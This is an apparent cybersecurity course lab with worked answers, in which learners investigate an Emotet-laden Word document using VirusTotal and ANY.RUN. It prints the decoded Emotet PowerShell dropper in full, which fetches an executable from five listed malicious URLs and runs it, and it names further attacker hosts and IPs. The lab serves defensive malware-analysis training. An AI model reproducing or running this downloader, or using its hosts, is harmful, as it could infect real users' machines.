9.4.5 Lab – Online Malware Investigation Tools
Objectives
- Part 1: Perform Static Malware Analysis
- Part 2: Perform Dynamic Malware Analysis
- Part 3: Investigate the Exploit
Introduction
There are many malware analysis tools that are available online. These tools provide reference and analysis functions. For example, you can submit indicators of compromise (IOC), such as file hashes, URLs, or IP addresses, and the tool will look up the IOC and return information about exploits that share these characteristics. Suspicious files can also be submitted. Static malware analysis can submit the file to a collection of antivirus programs and return the results. Further analysis may also be conducted by dissecting the files at the binary level. Online sandboxes will conduct dynamic malware analysis in which the malware exploit is actually run in the same way that it infects a vulnerable host computer. This is done by executing the malware in a virtual machine with special tools that monitor the behavior of the malware. This is known as a malware sandbox.
Dynamic malware analysis provides rich insights into the behavior of the malware and the artifacts that it creates. This information can be used to identify new or updated versions of malware, evaluate the effects of an infection, and lead to discoveries of further exploits. For example, some malware is used as a delivery service for other malware exploits. The delivery service malware may be identified, but the malware that it has delivered may not be. Dynamic analysis can reveal what was delivered and the exploit can be further investigated. In this lab, you will use two online malware investigation tools to learn about an exploit.
Scenario
You are working at XYZ, Inc. as a cyber technician. You have been asked to help a cybersecurity analyst evaluate security alerts that have been generated by your Intrusion Prevention System (IPS). The IPS has flagged a series of events as potentially malicious. The analyst has provided you with a group of potential IOCs to investigate. You are using two online tools to perform static and dynamic analysis based on the IOCs. While it possible to submit malware files also, the analyst feels it is better for you to use the IOCs until you have more experience handling real malware files.
Required Resources
- 1 PC with internet access
- CSE-LABVM
Instructions
Part 1: Perform Static Malware Analysis
In this part, you will submit a file hash to an online service that will look up the hash and return information about the associated malware file. The file hash is a computed representation, or fingerprint, for a file. File hashes are unique and extremely difficult to duplicate.
Step 1: Submit the hash.
In this step, you will submit the hash value to a static malware analysis tool that provides you with further information about the malware file if it is known to the tool.
a. Start the CSE-LABVM.
b. Open a web browser and navigate to the VirusTotal site.
c. The file hash that you have received is:
05383088d0d46a5b5f4de852703601a6c39f04844ab63a1850197fcb011f3c81
Select and copy the hash value. Click the Search entry on the VirusTotal menu and paste the hash into the search box. Press the Enter key to execute the search.
d. VirusTotal has information for the file, which means a file with the same hash has been previously submitted for analysis. You will see the results of the analysis.
Has malware entered the XYZ, Inc. network?
Yes. The file has been flagged as malicious.
In your job, what should you do now?
Immediately inform the cybersecurity team that an attack has occurred that is linked to this hash.
Step 2: Interpret virus total information.
a. VirusTotal submits files that have been uploaded by the public to a number of antivirus agents for analysis. In this case it has submitted to 63 antivirus products.
How many of the antivirus products flagged the file as malicious? What does this tell you about the reliability of antivirus programs?
45. Some antivirus programs will not detect and block this malware from downloading on a system.
b. Select the Details tab. Here you can learn more about the file. Review the information provided. Note that some of this information may not be accurate and may require confirmation with other sites.
What type of file has the malware been identified as?
MS Word document
c. Switch to the Relations tab. Here you can see IOCs such the IP addresses, websites, and domains that the malware attempted to contact. You will also see hashes for files that it created or downloaded from those domains. In addition, you can see files and processes that are related to execution of the malware on the host computer.
What is the first Domain that the malware makes an HTTP request to?
agavea.com.br
d. Switch to the Behavior tab. Review the information that is available here. Below the menu bar is drop down list that allows you to select information from different malware sandboxes. Drop the list down and select VMRay if it is not selected already.
The malware uses shell commands to open programs and processes. Locate the information about the shell commands that are executed during the exploit. This malware opens MS Windows PowerShell and passes a value to it.
What is unusual about that value?
It is a very long and apparently meaningless string of characters.
e. Click the Community tab. Look at the two submissions by thor. These are YARA signatures rendered by the THOR APT Scanner, a compromise assessment tool by Nextron Systems. Review the signatures. You don’t need to understand everything in them.
What are YARA signatures?
YARA signatures contain bit or text patterns that identify different types of malware. YARA scanning software uses these signatures to identify malware files that are on computer systems.
From the description fields in the YARA signatures, what can you learn about how the malware uses PowerShell?
As shown in the description fields of the two entries, it uses a VBA (macro) to send Base64 encoded shell command to PowerShell.
Part 2: Perform Dynamic Malware Analysis
Now we will use another tool to review the results of a dynamic analysis on a malware file that was submitted by the community. ANY.RUN is a company that offers a unique online dynamic and interactive sandbox. ANY.RUN offers a free service in which community users can upload suspected malware files for analysis. It provides a very rich set of analyses that provide a view into the behavior of the malware. Subscribers to the full version of ANY.RUN are able to run the malware on a virtual machine and interact with the malware if user actions are required to trigger it. Free users are only able to run malware samples on a 32-bit Windows 7 virtual machine, however paying subscribers can choose the operating system that fits their environment.
The ANY.RUN sandbox will dynamically run the malware and display details of what the malware does in the analysis interface. Paying users can also interact with the sandbox VM in which the malware is run. They can respond to prompts from the malware and inspect the infected operating system.
Like VirusTotal, you can look up IOCs to see the results of previously completed dynamic or interactive analyses. In this part of the lab, we will submit the same file hash to ANY.RUN and review the results.
Step 1: Access ANY.RUN and Submit IOC
a. In a web browser, navigate to ANY.RUN. Click Service from the horizontal menu to move to the sandbox service interface.
b. ANY.RUN provides a real-time dashboard of the current malware threat landscape with statistics regarding the distribution of malware threats and the ratio of recent submissions that have been determined as malicious, suspicious, or no threat. Clicking one of the countries in the map will show the list of public submissions from that country. Community users can view detailed analysis for each submission. Become familiar with this dashboard.
Step 2: Submit the IOC and review results
a. To search the public tasks for our IOC, click Public Tasks in the menu on the left.
b. Here, you can see the list of public tasks that can be accessed. They are arranged by the most recent submission. The tasks are labelled with the analysis verdict. Some are confirmed to be malware and others are benign files and others are suspicious.
c. Paste the hash from Part 1 into the search box in the upper right of the window and press enter.
d. You will see a page of malware exploits that have an artifact that corresponds to the hash value. Question:
Scroll through the list of public submissions. What is the name of the file that corresponds to the hash? Is there only one?
Data-5544-J5823545.doc and DocX69688X4511225.doc. Filenames are not part of the hash value, only the file contents are hashed. So be aware that files with different names could possibly be the same file in reality.
e. Locate the entry that is dated 01 June 2019 for file Data-5544-J5823545.doc. Click that entry.
Note: ANY.RUN executes the malware in their sandbox. Sometimes the malware does not execute fully, so some submissions will not include details of the entire exploit. For example, if access to a command-and-control (CnC or C2) server on the internet is required, it is possible that the server will not be available. If that is the case, the exploit may cease execution before it has reached its goal. For this reason, it is important to look at several of the entries in the search results to find one that appears to have fully run.
Step 3: Explore the interface
The ANY.RUN analysis interface provides very deep insights to many aspects of the malware behavior.
a. The computer desktop that is shown consists of a series of screen grabs of the computer desktop at different stages of the malware infection process. Mouse over the image and move the mouse right or left to move through the screenshots. In many cases, there is nothing to see because the malware displays nothing on the screen as it works. Sometimes, if user input is required to execute the malware, instead of a screen grab, you may see a movie that captures the user actions that were conducted as part of the malware infection process.
Review the screens from start to finish. From what you see in the screens, what seems to be the first part of the virus infection process?
It appears that an MS Word document is part of the process. The file requests that editing and content be enabled. It is possible that the file contains a malicious macro as part of the infection process.
b. On the right-hand side of the screen, you will see a group of blue bars that are displayed in a nested tree-like structure. This is a process tree. It shows all the software processes that were used in the exploit. Some of them are windows software components, and others are part of the malware.
c. Click the first process in the tree. Information about this process appears below the tree. Click the More Info button to see additional details for the process.
Which process is this?
winword.exe which is the Microsoft Word application.
Look at the command line. Which file was passed as an argument to the command that runs MS Word?
Data-5544-J5823545.doc, the file that corresponds to hash that we submitted.
What role do you think this document file played in the malware exploit? Feel free to search the web for your answer.
Microsoft Office files may include macros that are written in Visual Basic for Applications (VBA). VBA is a full-featured programing language that can perform powerful operations on a Windows computer. Threat actors insert malicious VBA code in innocent looking documents. The code can be run if the user activates macros after opening the file. This begins the sequence of events that leads to the infection of the computer. This is why it is very important to only activate content on a file that you trust completely.
Step 4: Analyze an Obfuscated Script
a. Close the More Info window by clicking the “x” in the upper right-hand corner. Click the process immediately below the MS Word process. Click More Info to view the details.
What is the name of the process? What is its purpose?
Powershell.exe PowerShell provides a powerful command line interpreter to Windows. It is a replacement for the command (cmd.exe) utility that originated with DOS.
PowerShell is often used by threat actors in living-off-the-land (LotL) attacks. What is an LotL attack, and how does PowerShell enable these attacks? Use the internet to search for answers as needed.
A LotL attack uses legitimate software that is already installed on a system for malicious purposes. Attacks that used existing legitimate software may be harder to detect than attacks that solely use malicious executables. PowerShell enables these attacks by providing a command line that can run scripts and executables.
b. In the Advanced Details of Process (More Info) window, look at the command line entry. This is the command that was issued by the malware macro in the Word document. You can see the powershell command and two arguments that were passed to the command, and then the long string that we saw
c. Copy the string using the copy icon next to the heading Command line.
d. Open a terminal to save the copied text into a text file named text with the echo command. The file name text is used as example for this activity.
cisco@labvm:~$ echo “copied file content” > text
where “copied text content” is the powershell command.
e. Open the file text using a text editor. A GUI based text editor, Pluma, is available on this VM.
f. In the text file, remove the string, powershell -nop -e. Save and close the file.
g. In the terminal, use the command base64 -d to decode the binary data as text and the output is piped to a new text file, text_64. The file name text_64 is used as example for this activity
cisco@labvm:~$ cat text | base64 -d > text_64
h. In Pluma, open the text_64 file, and you will see the decoded below but with different wrapping depending on the size of your terminal window.
$R3ZtKC='FCams3Q';$d1mU0azd = 184';$XMzUsP='PD2Qisza';$tZTLXzZq=$env:userprofile+'/'+$d1mU0azd+'.exe';$zlBUq6='Q0HuEwi';$pTl4Jz=.('n'+'e'+'w-object')
nET.W`EbC`Li`Ent;$NUzAMAR='http://agavea.com.br/font/tMfyxzMEnQ/@http://news-week.ru/2018/wvq6nzd_kywgcjzgi-273/@http://ab.fitzio.com/cgi-
bin/opiFtEAsf/@http://palmbeachresortcebu.com/wp-content/uploads/t9smfqj3_blm4xo-69526194/@http://thingsmadeforyouapps.com/wp-
admin/VpVOXxek/'.SPLit('@');$NOBJJj='Eo1jszRQ';foreach($j5YzrQKQ in $NUzAMAR){try{$pTl4Jz.DOwNlOADfiLe($j5YzrQKQ, $tZTLXzZq);$SHHj3v='Mpi_Cz1s';If ((.
('G'+'et'+'-Item') $tZTLXzZq).LenGTh -ge 31421)
{[Diagnostics.Process]::sTarT($tZTLXzZq);$s1EoklR='fL2dzmIj';break;$TQ0NStMF='mANFqY'}}catch{}}$Zi7lBM='qFLbpU'
i. The text is still a bit hard to read, but you can probably pick out some familiar features. We will use the text editor to make it a bit easier to read.
1) Click Search > Replace.
2) Enter ; (semicolon) in the Search for field.
3) Enter in the Replace with field.
4) Select the checkbox Match regular express.
5) Click Replace All.
6) Finally, repeat the above steps for @. The “@’ is used as a separator for one particularly long statement. Type @ in the Find field and replace it with .
The formatted code should look like this:
1 $R3ZtKC='FCams3Q'
2 $d1mU0azd = '184'
3 $XMzUsP='PD2Qisza'
4 $tZTLXzZq=$env:userprofile+'/'+$d1mU0azd+'.exe'
5 $zlBUq6='Q0HuEwi'
6 $pTl4Jz=.('n'+'e'+'w-object') nET.W`EbC`Li`Ent
7 $NUzAMAR='http://agavea.com.br/font/tMfyxzMEnQ/
8 http://news-week.ru/2018/wvq6nzd_kywgcjzgi-273/
9 http://ab.fitzio.com/cgi-bin/opiFtEAsf/
10 http://palmbeachresortcebu.com/wp-content/uploads/t9smfqj3_blm4xo-69526194/
11 http://thingsmadeforyouapps.com/wp-admin/VpVOXxek/'.SPLit('
12 ')
13 $NOBJJj='Eo1jszRQ'
14 foreach($j5YzrQKQ in $NUzAMAR){try{$pTl4Jz.DOwNlOADfiLe($j5YzrQKQ, $tZTLXzZq )
15 $SHHj3v='Mpi_Cz1s'
16 If ((.('G'+'et'+'-Item') $tZTLXzZq).LenGTh -ge 31421) {[Diagnostics.Process] ::sTarT($tZTLXzZq)
17 $s1EoklR='fL2dzmIj'
18 break
19 $TQ0NStMF='mANFqY'}}catch{}}$Zi7lBM='qFLb
j. Save the file text_64 if desired.
Step 5: Interpret the Malware Script
Although the file is still hard to read because it uses random groups of characters for variable names and values, and also attempts to obfuscate commands by using erratic capitalization and other means, a little knowledge of programming can help you to get an idea of what is going on.
a. Notice that a series of URLs appear in the code. Submit several of them to ANY.RUN, VirusTotal, or another service to see if they are malicious.
b. Note that the variable name, $tZTLXzZq appears in line four of the code above. Its value is concatenated with the text ‘.exe’.
What is the value that is assigned to $tZTLXzZq in line 2?
184
Return to ANY.RUN. What is the next process below powershell?
184.exe
c. Look at line 14. The command is foreach ($j5YzrQKQ in $NUzAMAR).
What is the contents of the $NUzAMAR variable as assigned in lines 8 – 11?
The string of URLs.
then runs the downloaded file 184.exe.
Step 6: View Details of Malware Connections and Known Threats
a. Below the desktop view, are a series of tabs that provide details of the malware behavior. The first tab shows the network behavior and the known threats. Click the HTTP requests tab. It shows the processes that attempted to make connections over HTTP.
Note: Although you are working in a VM, it is not recommended that you attempt to connect to any of these URLs.
Which URL did powershell.exe successfully connect with? This will match one of the URLs in the de-obfuscated
http://agavea.com.br/font/tMfyxzMEnQ/
What process then starts to issue requests to the web?
sansidaho.exe
The new process attempts to communicate with a series of URLs. From which URL does the process download binary files?
http://142.4.198.249
b. Click the Connections tab. Here you can see a timeline of the connections that were made during the malware exploit. On the DNS tab, you can see the DNS requests that were made by the malware. Note that you can download PCAPs for the connections and DNS requests. These files can be opened in Wireshark for further review.
c. Click the Threats tab. Here you will see Suricata IPS alert messages called signature identifiers (SID). These alerts are triggered by various malware behaviors as detected by IDS/IPS rules. These messages are used by various network security monitoring platforms.
Part 3: Investigate the Exploit
We have investigated a number of characteristics of this exploit, but we have not learned much about the exploit itself. ANY.RUN maintains a malware encyclopedia called the Tracker. If a Tracker article exists for the malware sample, ANY.RUN links to the article.
Note: You may need to register for an account in Any.Run to view some of the features discussed in this part.
a. In the pane on the right-hand sign of the interface, at top, is a header that provides information about the malware, including the MD5 hash for the file, the time it took to run the exploit in the sandbox, and a series of tags. If you click a tag, you will be taken to a tasks search that will list all the submitted exploits that share that tag.
b. Under the tags are several buttons. Click IOC to see all the IOCs for the submitted malware. These IOCs are diagnostic for the exploit. Finding any of them in your network monitoring data can indicate an exploit.
c. Finally, below the tags is a link to Tracker. As indicated the malware exploit is known and Emotet. Click the link to read about Emotet and answer the questions below.
What type of malware is Emotet and what are its major functions?
Emotet is a type of trojan does two things. It acts as a software worm that attempts to spread itself through local networks. It is also what is known as a “loader.” It is a delivery system for other malware exploits. So, if an Emotet exploit is successful, it will be linked to another exploit.
Emotet displays polymorphism. What does that mean?
Polymorphism involves changing features of the malware to avoid signatures. This includes changing IOCs, strings or patterns in the code, and other features of operation. It can also continuously download new and different malware by communicating with a command-and-control server.
What is the attack vector that spread the malware to potential victims?
It is distributed by email as a MS Word document that has malicious VBA macros.
What should users know to avoid infecting their computers (and other hosts on the network) with Emotet?
Be suspicious of unusual emails. Be very careful with file attachments, and do not activate macros on MS Office documents that you are not 100% sure are from a known source. If the source email address is known, contact the sender to verify that they sent the file if you are not expecting it.
d. Return to the analysis page for the Emotet malware variant that we have been working with. Beneath the name of the malware file, you will see a series of tags. Click the Emotet tag. This will execute a search for other malware that has been identified as Emotet. Click into several of the Public Submission reports until you find several that appear to have successfully executed in the sandbox. You should see a number of HTTP requests that occurred during the infection process.
What do you see that is different in these submissions from the report that we analyzed?
IOCs are different. The infected MS Word document has different file names or may be compressed. The malware creates, downloads, and executes different executable files from different locations.
Reflection Questions
1. You have gained significant insight into the way that a sophisticated malware exploit works. What have you learned about such exploits in general (not necessarily Emotet specifically)?
Malware exploits are complex and use many processes such as communication with malware servers, creation and download of malware files, and modifications to the Windows system, including the registry.
2. Go online and investigate other sandbox applications, both online tools and locally run. Describe several other tools and what they do. Type your answers here.
Cuckoo Sandbox is a leading open source automated malware analysis sandbox. It runs locally in a virtual machine. Intezer Analyze conducts dynamic analysis malware files or IOCs. It provides similar reports to ANY.RUN. Joe Sandbox Cloud provides very detailed reports for uploaded malware files.